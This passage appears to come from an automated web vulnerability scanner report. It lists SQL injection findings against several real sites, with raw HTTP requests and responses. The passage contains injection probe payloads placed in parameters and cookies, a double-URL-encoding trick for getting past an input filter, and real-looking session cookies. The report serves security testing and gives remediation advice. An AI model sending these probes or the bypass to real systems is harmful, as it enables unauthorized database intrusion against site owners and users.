Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 126254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT; expires=Mon, 30-Jan-2012 16:12:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

Request 2

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 125316
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:51 GMT; expires=Mon, 30-Jan-2012 16:12:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...

1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx?1'=1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 124531
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:31 GMT; expires=Mon, 30-Jan-2012 16:12:31 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.18. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The omniID cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the omniID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 260462
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:07:50 GMT; expires=Mon, 30-Jan-2012 16:07:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:27:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:07:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.19. http://js.revsci.net/gateway/gw.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

Request 1

GET /gateway/gw.js'%20and%201%3d1--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1488
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
   com.revenuescience.util.CustomerConfigManager.getCustomerConfig(CustomerConfigManager.java:20)
   com.revenuescience.audiencesearch.jss.gs.GatewayServlet.doGet(GatewayServlet.java:202)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

Request 2

GET /gateway/gw.js'%20and%201%3d2--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1180
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

1.20. http://redacted/ [CC cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/

Issue detail

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:13:01 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:13:01 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//
Content-Length: 54

object moved <a href="http://money.msn.com//">here</a>

1.21. http://redacted/ [s_sq cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:02:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

1.22. http://redacted/detail/stock_quote [ATC_ID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The ATC_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ATC_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ATC_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
